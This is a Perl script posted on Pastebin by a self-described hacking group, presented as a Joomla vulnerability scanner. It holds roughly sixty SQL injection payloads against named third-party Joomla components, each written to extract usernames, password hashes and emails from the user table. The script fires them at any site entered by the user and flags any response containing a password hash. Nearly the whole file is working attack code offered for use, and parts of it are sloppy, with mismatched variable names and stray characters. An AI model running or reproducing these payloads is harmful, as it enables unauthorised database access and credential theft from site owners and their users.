Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- ########################################
- #[~] Coded by : X-h4ck
- #[~] Greetz : 4LiFe - IlyrianWarrior - Wulns~ - st3aler - cRu3l.b0y - Hack-Down - H3LL
- #[!] Name : Joomla vulnerability scanner
- #[!] Email : mem001@live.com
- #h4ck0ff ~ sacred legion
- #Pirate.AL
- ########################################
- print q{
- +---------------------------------------------------------------+
- | h4ck0ff ~ sacred legion |
- |/*************************************************************\|
- | [x] Name : Joomla Vulnerability Scanner |
- | [x] Coded by : X-h4ck |
- | [x] E-mail : mem001[at]live[dot]com |
- | [x] Site : www.Pirate.AL |
- | [x] Greetz : 4LiFe - IllyrianWarrior - Wulns~ - st3aler |
- | cRu3l.b0y - Hack-Down - H3LL |
- +---------------------------------------------------------------+
- ########################################
- Joomla Vulnerability Scanner
- - SQLi scanner *remote v1 (2010 exploits)
- ########################################
- };
- use HTTP::Request;
- use LWP::UserAgent;
- ###xpl###
- $com_jeajaxeventcalendar="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
- $com_storedirectory="UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users";
- $com_annuaire="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
- $com_maianmedia="+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--";
- $com_alfurqan15x="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
- $com_markt="+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--";
- $com_sponsorwall="+and+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,6,7,8,9,10+from+jos_users--";
- $com_flipwall="+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--";
- $jedirectory="+1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),4,5,6,7,8,9,10,11+from+jos_users+where+id=userid--";
- $com_ezautos="+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--";
- $com_arash="+and 1=0 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users";
- $com_taxes="+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--";
- $com_vat="+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--";
- $com_blogs="/**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--";
- $com_gr="+union+select+1,concat(username,0x3a,password)+from+jos_users--";
- $com_simpleshop="UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--";
- $com_youtube="union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--";
- $com_joomdle="-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz";
- $com_itaromry="?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+";
- $com_iproperty="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
- $com_huruhelpdesk="/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--";
- $com_jomtube="+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
- $com_spa="%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--";
- $com_staticxt="+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users";
- $com_ybggal="+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--";
- $com_quran="/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--";
- $com_konsultasi="/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--";
- $com_newsfeeds="%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--";
- $wapmain="+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--";
- $com_abc="+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--";
- $com_joomradio="+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--";
- $com_jtm="/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search";
- $com_gbufacebook="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz";
- $com_manager="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
- $com_jp_jobs="/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users--";
- $com_sermonspeaker="/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/";
- $com_jdrugstopic="+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--";
- $com_mv_restaurantmenumanager="+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users";
- $com_articles="+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—-";
- $com_dcs_flashgames="+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--";
- $com_bidding="+UNION ALL SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--";
- $com_acteammember="+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en";
- $com_acstartseite="+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users〈=de";
- $com_productbook="+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--";
- $com_yelp="+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,concat_ws(0x3a3a3a,username,password),8,9,10,11,12,13,14,15,16,17+FROM+jos_users--";
- $com_dms="+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--";
- $com_jbpublishdownfp="+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users";
- $com_casino="+union+all+select+1,username,password,4,5+from+jos_users/*";
- $com_doqment="/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--";
- $com_alfresco="/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--";
- $com_countries="/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users";
- print "\nWeb page: http://wwww.site.com/ : ";
- chomp(my $target=<STDIN>);
- $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
- $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
- $host = $target . "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-999 .$com_jeajaxeventcalendar.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
- print "[*] Results : CHECK : \n";
- print "Joomla JE Ajax Event Component (com_jeajaxeventcalendar) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_storedirectory&task=view&id=-999 .$com_storedirectory.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_storedirectory) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_annuaire&view=annuaire&type=cat&id=-999 .$com_annuaire.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla (com_annuaire) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_maianmedia&view=music&cat=-999 .$com_maianmedia.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_maianmedia) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999 .$com_alfurqan15x.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_alfurqan15x) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_markt&page=show_category&catid=999 .$com_markt.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_markt) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_sponsorwall&controller=sponsorwall&catid=9999 .$com_sponsorwall.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_sponsorwall) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_flipwall&controller=flipwall&catid=999 .$com_flipwall.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_flipwall) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_jedirectory&view=item&catid=999 .$jedirectory.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla JE Directory SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_ezautos&Itemid=999&id=1&task=helpers&firstCode=999 .$com_ezautos.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_ezautos) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_arash&id=999 .$com_arash.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_arash) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_taxes&id=-999 .$com_taxes.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_taxes) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_vat&id=-999 .$com_vat.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_vat) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_blogs&task=details&b_id=999 .$com_blogs.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_blogs) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_blogs&task=details&b_id=-999 .$com_gr.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_gr) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=-999 .$com_simpleshop.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_simpleshop) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_youtube&id_cate=999 .$com_youtube.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_youtube) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=.$com_joomdle.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_joomdle) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_itarmory&view=guildmembers&Itemid=.$com_itarmory.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_itarmory) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999 .$com_iproperty.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_iproperty) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=999 .$com_huruhelpdesk.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?view=videos&type=member&user_id=-999 .$com_jomtube.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_jomtube) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_spa&view=spa_read_more&pid=-999 .$com_spa.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_spa) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_staticxt&staticfile=test.php&id=-999 .$com_staticxt.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_staticxt) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_ybggal&Itemid=999&catid=999 .$com_ybggal.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_ybggal) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_quran&action=viewayat&surano=999 .$com_quran.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_quran) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_konsultasi&act=detail&sid=999 .$com_konsultasi.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_konsultasi) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_newsfeeds&view=categories&feedid=-999 .$com_newsfeeds.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_newsfeeds) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/wap/wapmain.php?option=onews&action=link&id=-999 .$wapmain.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (wapmain.php) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_abc&view=abc&letter=AS§ionid=-999 .$com_abc.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_abc) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index2.php?option=com_joomradio&page=show_video&id=-999 .$com_joomradio.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_joomradio) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_jtm&view=search&view=search&author=-999 .$com_jtm.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component JTM Reseller SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_gbufacebook&task=show_face&face_id=-999 .$com_gbufacebook.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_gbufacebook) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_manager&view=flight&Itemid=999 .$com_manager.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_manager) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_jp_jobs&view=detail&id=-999 .$com_jp_jobs.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_jp_jobs) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_sermonspeaker&task=latest_sermons&id=-999 .$com_sermonspeaker.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_sermonspeaker) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_jdrugstopics&view=drugsdetails&id=-999 .$com_jdrugstopics.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_jdrugstopics) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=999 .$com_mv_restaurantmenumanager.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_mv_restaurantmenumanager) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_articles&task=view_addarticles&sid=999 .$com_articles.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_articles) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_dcs_flashgames&Itemid=61&catid=999 .$com_dcs_flashgames.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_dcs_flashgames) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_bidding&id=-999 .$com_bidding.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_bidding) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_acteammember&id=-999 .$com_acteammember.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_acteammember) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_acstartseite&Itemid=999 .$com_acstartseite.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_acstartseite) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_productbook&Itemid=999&func=detail&id=-999 .$com_productbook.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_productbook) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_dms&task=view_category&category_id=-999 .$com_dms.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_dms) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-999 .$com_jbpublishdownfp.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_jbpublishdownfp) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
- $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
- $host = $target . "/administrator/index.php?option=com_casino&task=category&id=-999 .$com_casino.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_casino) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_doqment&cid=-999 .$com_doqment.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_doqment) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_alfresco&task=edit&id_pan=999 .$com_alfresco.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_alfresco) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_countries&locat=999 .$com_countries.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_countries) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- print q{
- #####################################################
- #X-h4ck
- #h4ck0ff ~ sacred legion
- #www.Pirate.AL
- #####################################################
- };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement